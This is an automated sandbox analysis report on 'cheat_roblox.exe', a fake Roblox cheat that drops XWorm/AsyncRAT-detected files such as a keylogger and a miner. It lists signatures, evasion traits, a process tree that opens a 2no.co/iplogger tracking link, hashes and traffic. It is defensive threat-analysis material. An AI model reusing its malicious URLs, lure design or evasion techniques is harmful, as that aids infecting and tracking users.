Windows Analysis Report
cheat_roblox.exe

Overview

General Information

Sample name: cheat_roblox.exe
Analysis ID: 1484385
MD5: d49b1a211ce49bed3e766471501819c6
SHA1: ed8f8b0d45ad556115c14a00247c080fa82d56e9
SHA256: 1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
Tags: exe

Detection

XWorm
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • cheat_roblox.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\cheat_roblox.exe" MD5: D49B1A211CE49BED3E766471501819C6)
    • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7972 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 8092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 5364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,10681821834965854716,2612252034697891369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • RobloxPlayerInstaller.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" MD5: 27469372591B14FF1C57654FACB5E020)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7aa6:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\ msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\ msedge.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7aa6:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\Keyloger.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x74d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7575:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x768a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7186:$cnc4: POST / HTTP/1.1
Process Memory Space: cheat_roblox.exe PID: 7640 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
No Sigma rule has matched
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-30T00:49:18.443625+0200 | 2022930 | 443 | 49732 | TCP | A Network Trojan was detected
2024-07-30T00:49:42.483073+0200 | 2022930 | 443 | 61123 | TCP | A Network Trojan was detected
2024-07-30T00:49:41.144546+0200 | 2022930 | 443 | 61122 | TCP | A Network Trojan was detected

            AV Detection

Source: https://2no.co/ | Avira URL Cloud: Label: malware
Source: https://2no.co/redirect-2 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | ReversingLabs: Detection: 81%
Source: cheat_roblox.exe | ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\ msedge.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe | Joe Sandbox ML: detected
Source: cheat_roblox.exe | Joe Sandbox ML: detected
Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_8fc75716-f
Source: unknown | HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49741 version: TLS 1.0
Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | File created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_9F112.log
Source: unknown | HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.3.187.198:443 -> 192.168.2.9:61119 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.9:61121 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61122 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61123 version: TLS 1.2
Source: cheat_roblox.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB1F6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF6E7E3B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E3B190
Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF6E7E240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E240BC
Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF6E7E4FCA0 FindFirstFileExA,0_2_00007FF6E7E4FCA0
Source: global traffic | TCP traffic: 192.168.2.9:60079 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 192.168.2.9:61118 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 99.86.4.125
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | IP Address: 88.212.202.52
Source: Joe Sandbox View | IP Address: 104.21.4.208
Source: Joe Sandbox View | JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: global traffic | HTTP traffic detected: GET /24RXx6 HTTP/1.1 | Host: 2no.co | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /redirect/handshake.png HTTP/1.1 | Host: cdn.iplogger.org | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://2no.co/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1 | Host: counter.yadro.ru | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://2no.co/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1 | Host: counter.yadro.ru | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://2no.co/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Cookie: FTID=1cg1nj32dger1cg1nj00367b
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Host: cdn.iplogger.org | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://2no.co/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1 | Host: counter.yadro.ru | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Cookie: FTID=1cg1nj32dger1cg1nj00367b; VID=2DNPIG0nbdur1cg1nk003HAo
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Host: cdn.iplogger.org | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT | Range: bytes=0-2147483646 | User-Agent: Microsoft BITS/7.8 | Host: fs.microsoft.com
Source: global traffic | HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1 | Connection: Keep-Alive | User-Agent: DNS resiliency checker/1.0 | Host: fe3cr.delivery.mp.microsoft.com
Source: global traffic | HTTP traffic detected: GET /sls/ping HTTP/1.1 | Connection: Keep-Alive | User-Agent: DNS resiliency checker/1.0 | Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic | DNS traffic detected: DNS query: ecsv2.roblox.com
Source: global traffic | DNS traffic detected: DNS query: clientsettingscdn.roblox.com
Source: global traffic | DNS traffic detected: DNS query: 2no.co
Source: global traffic | DNS traffic detected: DNS query: cdn.iplogger.org
Source: global traffic | DNS traffic detected: DNS query: counter.yadro.ru
Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: client-telemetry.roblox.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: 26.165.165.52.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe HTTP/1.1 | Host: a.nel.cloudflare.com | Connection: keep-alive | Content-Length: 423 | Content-Type: application/reports+json | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Mon, 29 Jul 2024 22:49:17 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA | Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA | Cross-Origin-Embedder-Policy: require-corp | Cross-Origin-Opener-Policy: same-origin | Cross-Origin-Resource-Policy: same-origin | Origin-Agent-Cluster: ?1 | Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | Referrer-Policy: same-origin | X-Content-Options: nosniff | X-Frame-Options: SAMEORIGIN | cf-mitigated: challenge
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516741356.000000000260A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509001220.0000000002606000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508310105.0000000002602000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508695693.0000000002605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507934077.00000000025FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506659428.0000000002623000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506808610.0000000002628000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506725819.0000000002625000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516791173.000000000262D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507963440.000000000262D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516389477.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510001432.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508922887.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509200841.00000000025AA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508164365.000000000260F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: http://tools.medialab.sciences-po.fr/iwanthue/index.php
